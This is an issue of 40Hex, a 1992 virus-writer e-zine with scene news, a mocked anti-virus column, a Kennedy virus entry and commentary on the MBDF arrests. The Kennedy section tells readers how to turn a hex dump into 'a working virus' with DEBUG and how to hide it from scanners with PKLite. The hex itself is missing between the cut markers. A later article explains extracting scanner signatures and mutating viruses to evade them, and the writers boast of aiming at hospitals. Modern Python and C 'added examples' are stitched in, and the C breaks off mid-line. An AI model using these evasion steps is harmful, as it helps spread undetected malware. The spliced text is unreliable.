40Hex Number 6 Volume 2 Issue 2

40Hex Number 6 Volume 2 Issue 2                                       File 005


                I'm back, well kind of.  Anyways, a lot of people have been
asking, "What's going on with the group?" The question should be, "What's going
on with any group these days?" It seems to me that 1992 was the death of h/p,
or at least the "ice age" of it.  Everybody was either getting busted or
quitting the scene.  Oh well, what can I say about it.  Our group has been
having bad luck too.  Five (now six) busted as well as other assorted bad
things happening to members.

                Anyways, what's going on with us, huh?  Well the reason you
haven't heard much from us is because we haven't been releasing our new stuff
to BBS systems ( BBS system sounds as redundant as PIN number, I know) because
we have a strong feeling that members of such groups as the CVIA are logging on
to h/p boards in the hope of snatching the latest viruses.  Well not much you
can do about it if you run a BBS, unless you personally know everyone who calls
your board. But come to think of it - what good does it prove to release your
newest creation to the general public (of the h/p crowd) via BBS system?  Isn't
that the same principle as the warez puppy scene?  I guess you all can do
whatever turns you on but we kind of decided that it would be in our best
interests to release our stuff to BBS's only after they have been detected by
the popular scanners or until they are kind of old.  Not to fear, 40-HEX and
"Dark Angel Phunky Writing Guide" will still be on boards at the same rate as
always.

                As for all of you people bitching that we no longer have sites
and that we are dead, well you're dead - wrong.  The current sites are as follows
(in no specific order) - Digital Warfare (yes it's back, at a new number
however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's back),
and the newest addition - Crow Technology.  And as for us being dead yeah
right.

** Note from DecimatoR:
The U.S.S.R System recently went down, due to Time Lord getting into a little
hot water.  It WILL return however... we're just not sure when. **

** Note from GHeap:
I am coming back, gimme mo' time!

                So now with that out of the way, on to the other news.  Hmmm.....
Michelangelo caused quite a scare there for a while.  It was pretty cool
to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new
half hour computer talk show on syndicated radio.  I'm sure he wouldn't mind if
we got on the show some time soon.  Check your local radio guide for your local
station and time... I am offering a standing bounty of $1,500 for the person
willing to fly to Ohio and kick Crow Meister's ass for good.  A minor would be
preferred, being that he is under 18 and if I smashed him I could get sued or
something.  Just kidding, Crow Meister is cool with me, hihihihi... A new
federal law is being considered which if passed will outlaw the authorship of
computer viruses totally, research or not.  Read more about that later in this
issue... Hey, I might have a BBS up soon!  I have been saying that for the past
2 years haven't I?  Well that's the news as I see it, it's nice to be writing
for this rag again. 

        Check ya in 25 to life....

                                                        Hellraiser P/S
                                                        1992

This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
a disk in place of a fuckin print out...

40Hex Number 6 Volume 2 Issue 2                                       File 006

    Well, this little news "tid-bit" came from Attitude Adjuster, one of the
 few non-PHALCON/SKISM contributors (ok, the ONLY non P/S member), Thanks a
 lot dude, keep the submissions coming.  The article itself is quite sad,
 and makes me question the intelligence of our opposition.

                                        -)GHeap&Demo
                                        Thanx to CZ for THE line.
-------------------------------------------------------------------------------

                     - We need Computer Virus Snitches -
               Written By Mike Royko, Tribune Media Services.
                       Retyped by The Attitude Adjuster

 ============================================================================        
         Millions  of computer users are wondering how to protect themselves
 against  the wave of viruses that are threatening their machines. I have  a
 suggestion.[So do I, avoid Bnu 1.90Beta]
         First, they  should  remember  that these viruses don't spring from
 nature. They  are  little  computer  programs  that are created and sent on
 their  way  by people  that are brainy,  malicious and  arrogant.[I am  not
 brainy]
         So,  the  question is,  how  do you  find  the creators of computer
 virus programs?
         Because  they are  arrogant, it's  likely that they want someone to
 know what a clever thing they have done. They won't hold a press conference
 [Actually, we do hold press conferences.  See Michael Alexander@Computerworld]
 but  chances  are they  will brag  to a  trusted friend  or acquaintance or
 fellow hacker.
         It is sad, but the world is full of snitches.[Get a thesaurus] Look
 at John Gotti,  the nation's  biggest Mafia boss.  There was a time when it
 was  unthinkable for  even the lowest-level Mafia soldier to blab.  But now
 Gotti has to sit in court while his former  right-hand  man tells about how
 they got people whacked.  [We whack people too]
         So if Mafia  figures can be persuaded to tattle[Na-na-na-na-na], is
 there any reason  to believe that nerds  have a greater  sense of honor and
 loyalty?  [Yes, we also have brains]
        Of course[.] not, but how do you get them to do it?

        Money. [Now yer talking... my mom is really the Dark Avenger, I want
 my money now.]

        These  companies [what companies,  I only  hit hospitals]  could use
 petty cash  to place  ads in the  computer magazines and on  the electronic
 bulletin boards.  [Ok, call my BBS and  post this tidbit.  40Hex now has ad
 space available]
        The  ads  would  say  something  like: "A  $50,000  reward  for  any 
 information leading to the arrest and conviction of virus authors."
 [How can you convict a virus author. It isn't illegal.  Go play Tank Wars.]
        The  next question  would be  what to  do with the virus makers once
 they  have been  caught. And  that's  the  key  to putting  an  end to  the
 problem:  something  that could  be  posted  on  those electronic  bulletin
 boards  that  might cause  an aspiring  virus-maker to go take a brisk walk
 instead.
         A judge  would sit  and listen  to an  attorney who would say some-
 thing like this:
         "Your  honor,  what we  have here  is an  otherwise  fine young man
 from  a good  family. His  father is  a brilliant scholar, and the son will
 someday be the same."[I am going to be a certified scholar when I grow up.]
         "What  he did  was no  more than  an intellectual prank, a cerebral
 challenge of  sorts. Like  the man who climbed Mount Everest because it was
 there, he created the virus and sent it forth because it was there."
         Then, we can hope, the judge might say something like this:
         "Yes,  I am  impressed  by  the  defendant's  brain  power.  And  I
 expected you to ask me to give him a slap on the wrist."
         "However,  he  is  not  a child.  He is an adult. And I would think
 that  so  brilliant a  grown  man would  know better  than to amuse himself
 by screwing with the lives of strangers."  [I haven't screwed one stranger]
         "It's  as if  he hid  inside  the businesses and institutions until
 they  were closed  and  everyone had  gone home. Then  he came out and went
 through  every  filing cabinet  and drawer and shredded or burned every bit
 of useful information he could find."[Cool! Let's try it.]
         "Now,  counselor, what  would you and your law partners say if some
 street mope [See Thesaurus] did that  to your firm - crept in and destroyed
 every document in your offices? Including the names of clients that owe you
 money. Hah, you would be in here asking me to hang him from a tree."[I love
 hanging from trees]
         "So  don't  give  me that  smart  kid  from  a good family routine.
 [I ain't smart, and family ain't good] He is a self-centered,  insensitive,
 uncaring,  arrogant goofball  [And  damn proud].  He didn't  give a  second
 thought to the  chaos or  heartbreak he would  cause an adoption  agency, a
 hardworking businessman or a medical clinic." [Yes I did.  I aim for them.]
         "Therefore,  I sentence him  to the maximum sentence the law allows
 in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really
 terrible place, filled with all sorts of crude, insensitive hulks."
 [Jay-walkers]
         "Bailiff,  please get the defendant up off the floor and administer 
 some smelling salts."[More like, why is the defendant laughing?]
         "And change his trousers, quickly."[Fuck you]

                                    []comments added by Demogorgon and GHeap

 ============================================================================


                I hope you enjoyed that one as much as I did! Okay, I
        see some really neat things with this man's article. First off,
        I'm sure he's an adept programmer... that is, he can probably
        figure out how to get his VCR to tape something while he is
        off writing his brilliant articles. I enjoy his narrow-minded
        definition of virii (that was mentioned in 40Hex 5), of course,
        all virii are those evil overwriting, trigger date, resident,
        boot track infecting swine (yeah, he probably learned what a
        virus was from watching ABC News covering the Michelangelo
        crisis!)
                I also enjoy his opinion that all virus authors are
        nerds.  First off, what the hell is a nerd?  I mean, I have
        written a virus before (not saying it was any good), but, I
        don't feel like a nerd!  In fact, I feel quite superior to
        most of the idiots like this guy.  And, I like his great
        statement about my loyalty.  Yes, I'm gonna narc on [PHALCON/
        [Forget this again, and die]]SKISM for $50,000!!! Yeah, right.
        There are a lot of narcs on this not-so good earth, so choose
        your friends wisely.
                I'm quite sure that ads on BBS's (electronic bulletin
        boards! No... cork ones!) would just sufficiently pump up user
        discussion of virii.  I'm not scared of fed intervention, and
        I doubt any authors I know are either.
                This was touched on in 40Hex 5, virus authors are not
        responsible for the spread of their virii unless they are
        actively spreading them!  I mean, it's not my fault that K-Rad
        Man sent my Hard Drive Blender (slices, dices, minces sectors)
        to 1000 Bible boards in Utah. Apparently it hasn't dawned on
        this guy that most virii are not written to be destructive.
        Actually, that's a lie.  There are a lot of virii out there that
        are destructive, but that is changing.  People like the
        PHALCON/SKISM crew realize that not everything must be
        destructive, opening the doors to much larger virus projects
        (ie Bobisms)
                One more thing... QUIT EQUATING THE WORD 'hacker' TO
        EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'


                I'm gonna get this dude's phone #, I say we call him
        sometime...


                        -The Attitude Adjuster-

40Hex Number 6 Volume 2 Issue 2                                      File 007
           
           
     Let's see what good ole' Patty has to say about this:


 Virus Name:  Kennedy
 Aliases:     Dead Kennedy, 333, Kennedy-333
 Scan ID:     [Kennedy]
 V Status:    Endangered
 Discovered:  April, 1990
 Symptoms:    .COM growth; message on trigger dates (see text);
              crosslinking of files; lost clusters; FAT corruption
 Origin:      Denmark
 Eff Length:  333 Bytes
 Type Code:   PNCKF - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
                    NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
                    Novi 1.0.1+, Sweep 2.3.1+, UTScan
 Removal Instructions:  F-Prot, VirHunt 2.0+, or delete infected files
 General Comments:
       The Kennedy virus was isolated in April 1990.  It is a generic
       infector of .COM files, including COMMAND.COM.

       This virus has three activation dates: June 6 (assassination of
       Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
       and November 22 (assassination of John F. Kennedy 1963) of any year.
       On activation, the virus will display the following message:

               "Kennedy is dead - long live 'The Dead Kennedys'"

       The following text strings can be found in the viral code:

               "\command.com"
               "The Dead Kennedys"

       Systems infected with the Kennedy virus will experience
       cross-linking of files, lost clusters, and file allocation table
       errors (including messages that the file allocation table is bad).


--------------------------------Cut Here------------------------------------


---------------------------------Cut Here-----------------------------------


  Ok there it is.  Not the most impressive virus around and it's caught by just
about every scan on the market, but take PKLite to it and then remove the PKLite
header (Use NOLITE in this issue) and no one will be able to find it.  Anyway it
gets the job done.

To make the above hex into a working file, first cut on the dotted lines.  
Name the resulting file KENNEDY.TXT.
Then: DEBUG < KENNEDY.TXT  and you'll have a working virus.


					-Instigator
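
Added example (not part of the original 40Hex text, and not taken from any scanner named above): a Python triage check built only from the indicators in the entry quoted in this file, namely the two text strings, the 333-byte effective length and the three trigger dates. Because string matching stops working once a file's bytes are compressed, it also compares each .COM file's size against a recorded baseline; the function names and sample buffers are constructed for illustration.

```python
"""Triage .COM files against the Kennedy indicators quoted in the entry above."""

# Indicators copied from the virus-information entry on this page.
KENNEDY_STRINGS = (b"\\command.com", b"The Dead Kennedys")
EFFECTIVE_LENGTH = 333                          # bytes added to an infected .COM
TRIGGER_DATES = {(6, 6), (11, 18), (11, 22)}    # (month, day) of any year


def string_hits(data):
    """Return the listed strings present in data (case-insensitive match)."""
    folded = data.lower()
    return [s.decode("ascii") for s in KENNEDY_STRINGS if s.lower() in folded]


def is_trigger_date(month, day):
    """True when the date is one of the three activation dates in the entry."""
    return (month, day) in TRIGGER_DATES


def triage_com(name, data, baseline_size=None):
    """Classify one file as skipped / clean / review / suspect.

    baseline_size is the file's length recorded while it was known good
    (an assumption of this example: such a record exists). The size check
    does not depend on the strings being readable in the file.
    """
    if not name.lower().endswith(".com"):
        return {"file": name, "verdict": "skipped", "reasons": ["not a .COM file"]}

    strong, weak = [], []

    hits = string_hits(data)
    if len(hits) == len(KENNEDY_STRINGS):
        strong.append("both listed strings present")
    elif hits:
        # One string alone is weak evidence: a path such as \command.com
        # can legitimately appear in ordinary DOS programs.
        weak.append("one listed string present: " + hits[0])

    if baseline_size is not None:
        growth = len(data) - baseline_size
        if growth == EFFECTIVE_LENGTH:
            strong.append("grew by exactly 333 bytes since baseline")
        elif growth:
            weak.append("size changed by %+d bytes since baseline" % growth)

    verdict = "suspect" if strong else "review" if weak else "clean"
    return {"file": name, "verdict": verdict, "reasons": strong + weak}


# Constructed sample buffers: filler bytes plus the text strings only, no code.
CLEAN = b"\x00" * 1200
MARKER = b"\\COMMAND.COM\x00The Dead Kennedys"
STRINGS_AND_GROWTH = CLEAN + MARKER.ljust(EFFECTIVE_LENGTH, b"\x00")
GROWTH_ONLY = b"\x01" * (len(CLEAN) + EFFECTIVE_LENGTH)   # strings not visible

if __name__ == "__main__":
    samples = (
        ("GAME.COM", CLEAN),
        ("EDIT.COM", STRINGS_AND_GROWTH),
        ("TOOL.COM", GROWTH_ONLY),
        ("README.TXT", STRINGS_AND_GROWTH),
    )
    for sample_name, sample_data in samples:
        print(triage_com(sample_name, sample_data, baseline_size=len(CLEAN)))
    print("trigger date today?", is_trigger_date(11, 22))
```
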

40Hex Number 6 Volume 2 Issue 2                                       File 008

Take a look at this.  I picked it up on fidonet, originally from Virus-L
digest.  All the stuff in *< >*'s are my comments.
                - Demogorgon

------------------------------
VIRUS-L Digest   Wednesday, 26 Feb 1992    Volume 5 : Issue 44
------------------------------

Date:    Tue, 25 Feb 92 10:10:14 -0500
From:    mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: MBDF Suspects Arrested (Mac)

The Cornell Daily Sun reported in this morning's issue that two
Cornell University sophomores, David Blumenthal and Mark Pilgrim, were
arrested Monday evening and arraigned in Ithaca City Court on one
count each of second degree computer tampering, in connection with the
release of the MBDF virus that infected Macs worldwide over the last
several days.  The two are being held in Tompkins County Jail.
*< huh?  How does one get arrested for spreading a virus, you ask? read on >*
Further charges are pending.

---
** many lines of mail routing crap have been deleted **

Date: Tue, 25 Feb 1992 11:47:32 PST
From: lipa@camis.stanford.edu (Bill Lipa)
Subject: Alleged MBDF virus-creators arrested at Cornell

"Computer Virus Traced to Cornell Students"

by Jeff Carmona

[The Cornell Daily Sun, 25 February 1992]

  Two Cornell students were arrested yesterday for allegedly creating and
launching *< launching ? Bon voyage, we launched you !>* a computer virus that
crippled computers around the world, according to M. Stuart Lynn, the
University's vice president for information technologies.
  David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
Public Safety officers and arraigned in Ithaca City Court on one count of
second-degree computer tampering, a misdemeanor, *< cool, it's only a
misdemeanor, how bad could it be ? >* Lynn said.
  Both students were remanded to the Tompkins County Jail and remained in
custody early this morning. They are being held on $2,000 cash or $10,000
bail bond, officials said.
  Cornell received national attention in Nov. 1988 when Robert T. Morris
Jr., a former graduate student, was accused of unleashing a computer virus
into thousands of government and university computers.
  Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined
$10,000, given a three-year probation and ordered to do 400 hours of community
service by a federal judge in Syracuse, according to Linda Grace-Kobas,
*< What's a Koba?? >* director of the Cornell News Service.
  Lynn would not compare the severity of the current case with Morris',
saying that "each case is different."
  Lynn said the virus, called "MBDFA" was put into three Macintosh games --
Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle.
  On Feb. 14, the games were launched from Cornell to a public archive at
Stanford University in Palo Alto, Calif., Lynn said.
*< I guess these guys actually put it up on the archive under their own      >*
*< accounts! Don't they know they can trace that stuff? duhhh...             >*
From there, the virus spread to computers in Osaka, Japan and elsewhere around
the world *< the archive was a dumb idea if that's how they got caught, but it
spread like hell >* when users connected to computer networks via modems, he
added. It is not known how many computers the virus has affected worldwide, he
explained.
  When computer users downloaded the infected games, the virus caused "a
modification of system software," *< oooh...let's not get too technical >* Lynn
said. "This resulted in unusual behavior and system crashes," he added.
  Lynn said he was not aware of anyone at Cornell who reported finding the
virus on their computers.
  The virus was traced to Cornell last Friday, authorities were quickly
notified and an investigation began, Lynn said.
  "We absolutely deplore this kind of behavior," Lynn said. "We will pursue
this matter to the fullest."
  Armed with search warrants, Public Safety investigators removed more than
a dozen crates full of evidence from the students' residences in Baker and
Founders halls on West Campus. *< sounds like a typical, over-kill bust to
me.  If you don't know what it is, take it. >*
Public Safety officials refused to disclose the contents of the crates or
issue any comment about the incident when contacted repeatedly by phone last
night.  *< that's because they don't know what the fuck the stuff is >*
  "We believe this was dealt with very quickly and professionally," Lynn
said.
  The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today
and additional charges are pending, according to Grace-Kobas.
  Because spreading a computer virus violates federal laws, "conceivably,
the FBI could be involved," she added. Officials with the FBI could not be
reached to confirm or deny this.
  Blumenthal and Pilgrim, both 19-year-olds, were current student employees
at Cornell Information Technologies (CIT), Lynn said. He would not say
whether the students launched the virus from their residence hall rooms or
from a CIT office.
  Henrik N. Dullea '61, vice president for University relations, said he
thinks "the act will immediately be associated with the University," not
only with the individual students charged.
  Because a major virus originated from a Cornell student in the past, this
latest incident may again "bring a negative reaction to the entire
institution," Dullea said. *< "blah, blah, blah" >*
  "These are very selfish acts," Lynn said, referring to the intentional
distribution of computer viruses, because innocent people are harmed.
  Lynn said he was unaware of the students' motive for initiating the virus.
Lynn said CIT put out a notice yesterday to inform computer users about the
"very virulent" virus. A virus-protection program, such as the new version of
Disinfectant, can usually cure computers, but it may be necessary to "rebuild
the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your-
hard-drive" !>* in some cases, he added.
  A former roommate of Blumenthal said he was not surprised by news of the
arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
'95, his roommate from last semester. "He was in front of the computer all
day," Fuller said.
  Blumenthal, who had a modem, would "play around with viruses because they
were a challenge to him," Fuller said. He said that, to his knowledge,
Blumenthal had never released a virus before.

-->-<------ Cut Here --------------------------

------------------------------
VIRUS-L Digest   Friday, 28 Feb 1992    Volume 5 : Issue 46
------------------------------

Date:    Wed, 26 Feb 92 11:08:45 -0800
From:    karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)

                           NO RESTRICTIONS
        _____________________________________________________
             The Computer Incident Advisory Capability
                         ___  __ __    _     ___
                        /       |     / \   /
                        \___  __|__  /___\  \___
        _____________________________________________________
                           INFORMATION BULLETIN

               New Virus on Macintosh Computers: MBDF A

February 25, 1992, 1130 PST                                 Number C-17

________________________________________________________________________
NAME:     MBDF A virus
PLATFORM: Macintosh computers-except MacPlus and SE (see below)
DAMAGE:   May cause program crashes
SYMPTOMS: Claris applications indicate they have been altered; some
          shareware may not work, unexplained system crashes
DETECTION &
ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6,
             VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
________________________________________________________________________
                     Critical Facts about MBDF A

A new Macintosh virus, MBDF A, (named for the resource it exploits)
has been discovered.  This virus does not appear to maliciously cause
damage, but simply copies itself from one application to another.
MBDF A was discovered at two archive sites in newly posted game
applications, and has a high potential to be very widespread.

Infection Mechanism

This virus is an "implied loader" virus, and it works in a similar
manner to other implied loader viruses such as CDEF and MDEF.  Once
the virus is active, clean application programs will become infected
as soon as they are executed.  MBDF A infects only applications, and
does not affect data files.  This virus replicates under both System 6
and System 7.  While MBDF A may be present on ALL types of Macintosh
systems, it will not spread if the infected system is a MacPlus or a
Mac SE (although it does spread on an SE/30).

Potential Damage

The MBDF A virus has no malicious damaging characteristics, however,
it may cause programs to inexplicably crash when an item is selected
from the menu bar.  Some programs, such as the shareware
"BeHierarchic" program, have been reported to not operate correctly
when infected.  Applications written with self-checking code, such as
those written by the Claris corporation, will inform the user that
they have been altered.

When MBDF A infects the system file, it must re-write the entire
system file back to disk; this process may take two or three minutes.
If the user assumes the system has hung, and reboots the Macintosh
while this is occurring, the entire system file will be corrupted and
an entire reload of system software must then be performed.

This virus can be safely eradicated from most infected programs,
although CIAC recommends that you restore all infected files from an
uninfected backup.

Detection and Eradication

Because MBDF A has been recently discovered, only anti-viral packages
updated since February 20, 1992 will locate and eradicate this virus.
All the major Macintosh anti-viral product vendors are aware of this
virus and have scheduled updates for their products.  These updates
have all been available since February 24, 1992.  The updated versions
of some products are Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6,
SAM 3.0, VirusDetective 5.0.2, and Rival 1.1.10.  Some Macintosh
applications (such as the Claris software mentioned above) may contain
self-verification procedures to ensure the program is valid before
each execution; these programs will note unexpected alterations to
their code and will inform the user.

MBDF A has been positively identified as present in two shareware
games distributed by reliable archive sites: "Obnoxious Tetris" and
"Ten Tile Puzzle".  The program "Tetricycle" (sometimes named
"Tetris-rotating") is a Trojan Horse program which installs the virus.
If you have downloaded these or any other software since February 14,
1992 (the day these programs were loaded to the archive sites), CIAC
recommends that you acquire an updated version of an anti-viral
product and scan your system for the existence of MBDF A.

For additional information or assistance, please contact CIAC:

        Karyn Pichnarczyk
        (510) 422-1779 or (FTS) 532-1779
        karyn@cheetah.llnl.gov

Call CIAC at (510)422-8193/(FTS)532-8193.
Send e-mail to ciac@llnl.gov

PLEASE NOTE: Many users outside of the DOE and ESnet computing
communities receive CIAC bulletins.  If you are not part of these
communities, please contact your agency's response team to report
incidents.  Some of the other teams include the NASA NSI response
team, DARPA's CERT/CC, NAVCIRT, and the Air Force response team.  Your
agency's team will coordinate with CIAC.

CIAC would like to thank Gene Spafford and John Norstad, who provided
some of the information used in this bulletin.  This document was
prepared as an account of work sponsored by an agency of the United
States Government.  Neither the United States Government nor the
University of California nor any of their employees, makes any
warranty, express or implied, or assumes any legal liability or
responsibility for the accuracy, completeness, or usefulness of any
information, apparatus, product, or process disclosed, or represents
that its use would not infringe privately owned rights.  Reference
herein to any specific commercial products, process, or service by
trade name, trademark, manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation or
favoring by the United States Government or the University of
California.  The views and opinions of authors expressed herein do not
necessarily state or reflect those of the United States Government or
the University of California, and shall not be used for advertising or
product endorsement purposes.

-->-<----- Cut Here -------------------------

---

------------------------------
VIRUS-L Digest   Friday, 28 Feb 1992    Volume 5 : Issue 46
------------------------------

Date:    Wed, 26 Feb 92 15:32:02 -0500
From:    mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: Cornell MBDF Press Release (Mac)

_____________________________________________________
PRESS RELEASE ISSUED BY CORNELL NEWS SERVICE 2/25/91

Students charged
with releasing
computer virus

By Linda Grace-Kobas

Following a university investigation that tracked a computer virus and
its originators, two Cornell students were arrested and charged with
computer tampering for allegedly launching a computer virus embedded in
three games into national computer archives.  Arraigned Feb. 24 in
Ithaca City Court were David S. Blumenthal, 19, a sophomore in the
College of Engineering, and Mark Andrew Pilgrim, 19, a sophomore in the
College of Arts and Sciences.  They were charged with computer tampering
in the second degree, a Class A misdemeanor.  The pair is being held in
Tompkins County Jail with bail set at $2,000 cash bond or $10,000
property bond.  At a hearing Tuesday afternoon, Judge Sherman returned
the two to jail with the same bond and recommended that they remain in
jail until at least Friday pending the federal investigation.  A
preliminary hearing is set for April 10.

Both students were employed by Cornell Information Technologies, which
runs the university's computer facilities.  Pilgrim worked as a student
operator in an Apple Macintosh facility from which the virus is believed
to have been launched.  The university's Department of Public Safety is
working with the Tompkins County district attorney's office, and
additional charges are expected to be filed.  The Federal Bureau of
Investigation has contacted the university to look at possible violations
of federal laws, officials said.  The Ithaca Police Department is also
assisting in the investigation.

"We absolutely abhor this type of behavior, which appears to violate the
university's computer abuse policy as well as applicable state and
federal law," commented M. Stuart Lynn, vice president for information
technologies, who headed the investigation to track the originators of
the virus.  "Cornell will pursue all applicable remedies under our own
policies and will cooperate with law enforcement authorities."

Lynn said Cornell was alerted Feb. 21 that a Macintosh computer virus
embedded in versions of three computer games, Obnoxious Tetris,
Tetricycle and Ten Tile Puzzle, had possibly been launched through a
Cornell computer.  A virus is normally embedded in a program and only
propagates to other programs on the host system, he explained.
Typically, when an infected application is run, the virus will attack the
system software and then other applications will become infected as they
are run.

The virus, MBDF-A, had been deposited on Feb. 14 directly and indirectly
into several computer archives in the U.S. and abroad, including
SUMEX-AIM at Stanford University and archives at the University of Texas,
the University of Michigan and another in Osaka, Japan.  These archives
store thousands of computer programs available to users of Internet, the
worldwide computer network.

Macintosh users who downloaded the games to their computers were subject
to a variety of problems, notably the modification of system software and
application programs, resulting in unusual behavior and possible system
crashes.  Apparently, there was no intent to destroy data, Lynn said, but
data could be destroyed in system crashes.

Reports of the virus have been received from across the United States and
around the world, including Wales, Britain, Lynn said, adding that he has
no estimate for the number of individuals who might have obtained the
games.

As soon as the virus was identified, individuals and groups across the
country involved with tracking viruses sent messages across computer
networks to alert users who might have been affected by the virus, Lynn
added.  The virus has since been removed from all archives and
"disinfectant" software available to the Internet community has been
modified so that individual Macintosh users can purge their computers of
it.

"Our sense is that the virus was controlled very rapidly," he said.  In
1988, Cornell received national attention when graduate student Robert T.
Morris Jr. launched a computer virus into important government and
university research networks.  That virus, actually considered a "worm"
since it was self-perpetuating, caused major damage in high-level
systems.  Morris was convicted under the 1986 Computer Fraud and Abuse
Act and fined $10,000, given three years probation and ordered to do 400
hours of community service by a federal judge in Syracuse, N.Y.

The new virus differs greatly from the Morris worm, Lynn said.  "This
virus is not to be compared with the Morris worm, which independently
moved from machine to machine across the network," he explained.  All
Macintosh users should take appropriate measures to be certain their
systems are not infected with the virus.

News Service science writer William Holder also contributed to
this report.

---
Mark H. Anbinder                      607-257-2070 - FAX 607-257-2657
BAKA Computers, Inc.                  QuickMail QM-QM 607-257-2614
200 Pleasant Grove Road               mha@baka.ithaca.ny.us
Ithaca, NY 14850

-->-<----- Cut Here -------------------------
40Hex Number 6 Volume 2 Issue 2                                       File 009
 
               -=[ The 'McAfee scan' viral footprint codes ]=-
 
                                      -or-
 
                /*******************************************/
                /* A fool and his scanner, can part a user */
                /*       from his hard earned money.       */
                /*******************************************/
 
                                - written by -
                                 GodNet Raider
                                    - of -
                             The CyberUnderground


                         Thrown into 40Hex by DecimatoR
                            from Usenet alt.security 
 
 -=[ "Information is the greatest weapon of power to the modern wizard." ]=-
 
]----------------------------------------------------------------------------[
 
Introduction:
-------------
 
    Recently I began to wonder about the usefulness of 'virus scanners'
and what, if any, difference they have from a simple text/hex search
program (like Norton's filefind/ts). And if there was no real DIFFERENCE,
how secure is the system that used them?
 
Problems with scanning:
-----------------------
 
    The first question I had to ask was, What does a 'virus scanner' actually
look for? Does it only look for one string of codes or several at different
places in the file?
 
    To answer this question I called a local BBS and dl'ed McAfee's
scan3.7v64 (to evaluate and after my tests, it was erased for its lack of
offering any real protection). Then I went to my archives to retrieve some
viruses I have experimented with in the past (among which were Jerusalem B
and Dark Avenger).
 
    I ran scan to verify that the virus files were viruses (3 of which did
not set off any alarm even though there was a listing in the documentation
for them, so I removed them from the test). Then, using a sector editor, I
looked at the source for the McAfee asso. scan3.7v64 (hereafter known just as
scan64) to find that the footprint information was encoded. Needless to say
this did not stop me (for the sake of those who are into the tech aspects of
things, the actual method used to get the codes is included at the end of the
article with the codes found). It took less than an hour to get the codes I
was looking for (without disassembling the code but by looking into the
memory allocated to the program).
 
    What I found out was scan was just a simple hex searcher (that kept
its data locked up till needed). It could also be fooled by any program
that contained the same hex string as a real virus (this was proved when,
using a sector editor, I added the scan64 footprint for the Jerusalem B
into the top of a text file (a place this code would never show up in a real
infection) then renamed it to *.com; scan64 reported it as infected).
 
    Once the codes were obtained, using debug directly on a virus file,
I was able to mutate the virus to no longer be detectable by scan64 without
destroying the integrity of it. For the virus was still able to infect files,
and scan64 could no longer track it. I was still able to track and control it
using Norton's filefind, diskmon, diskedit, and (of course) DOS erase.
 
    So it seems my question was answered. Some 'virus scanners' just scan
for a single string of hex characters. This is fine if viruses NEVER changed
or programs would NEVER use code similar to what a virus would (the smaller
the footprint string the bigger the chance of mistaken alarms). For if
a 'virus scanner' programmer just keeps making a new release each time there
is a new virus (and I will not get into the morality of charging customers
the full price of a software upgrade rather than allowing them to buy/dl
new footprint data files as they become available) the program will
eventually grow to unwieldy sizes. And it should be noted there are other
programs that may do the same job faster, with more upward compatibility, and
you may already have them on hand.
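 
    Added example (not part of the original article and not McAfee's code):
a plain hex search run over constructed buffers, showing the false alarm on a
text file and the miss after a one-byte change described above. The footprint
bytes, the buffers and the offset window passed to find_footprint_in are
assumptions made up for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed 6-byte footprint; not a value from scan64 or any real scanner. */
static const unsigned char DEMO_FP[6] = {0xDE, 0xC0, 0xAD, 0x0B, 0xEA, 0x7E};

/* Constructed inputs. PROGRAM carries the footprint at offset 8. */
static const unsigned char PROGRAM[] = {
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
    0xDE, 0xC0, 0xAD, 0x0B, 0xEA, 0x7E, 0x09, 0x0A};

/* PROGRAM with one footprint byte changed (0xAD became 0xAC). */
static const unsigned char ALTERED[] = {
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
    0xDE, 0xC0, 0xAC, 0x0B, 0xEA, 0x7E, 0x09, 0x0A};

/* Plain text with the footprint pasted at the very top. */
static const unsigned char TEXTFILE[] = {
    0xDE, 0xC0, 0xAD, 0x0B, 0xEA, 0x7E,
    'j', 'u', 's', 't', ' ', 't', 'e', 'x', 't', '\r', '\n'};

/* Search for fp starting at offsets lo..hi only; first hit or -1. */
long find_footprint_in(const unsigned char *buf, size_t len,
                       const unsigned char *fp, size_t fplen,
                       size_t lo, size_t hi)
{
    size_t i;

    if (fplen == 0 || len < fplen)
        return -1;
    if (hi > len - fplen)
        hi = len - fplen;            /* clamp to the last possible start */
    for (i = lo; i <= hi; i++)
        if (memcmp(buf + i, fp, fplen) == 0)
            return (long)i;
    return -1;
}

/* Plain hex search over the whole buffer, as the article describes. */
long find_footprint(const unsigned char *buf, size_t len,
                    const unsigned char *fp, size_t fplen)
{
    return find_footprint_in(buf, len, fp, fplen, 0, len);
}

int main(void)
{
    size_t n = sizeof DEMO_FP;

    printf("program, whole file : %ld\n",
           find_footprint(PROGRAM, sizeof PROGRAM, DEMO_FP, n));
    printf("altered, whole file : %ld\n",
           find_footprint(ALTERED, sizeof ALTERED, DEMO_FP, n));
    printf("text, whole file    : %ld\n",
           find_footprint(TEXTFILE, sizeof TEXTFILE, DEMO_FP, n));
    /* Assumed rule: this footprint is only meaningful at offsets 4..12. */
    printf("text, offsets 4..12 : %ld\n",
           find_footprint_in(TEXTFILE, sizeof TEXTFILE, DEMO_FP, n, 4, 12));
    printf("program, 4..12      : %ld\n",
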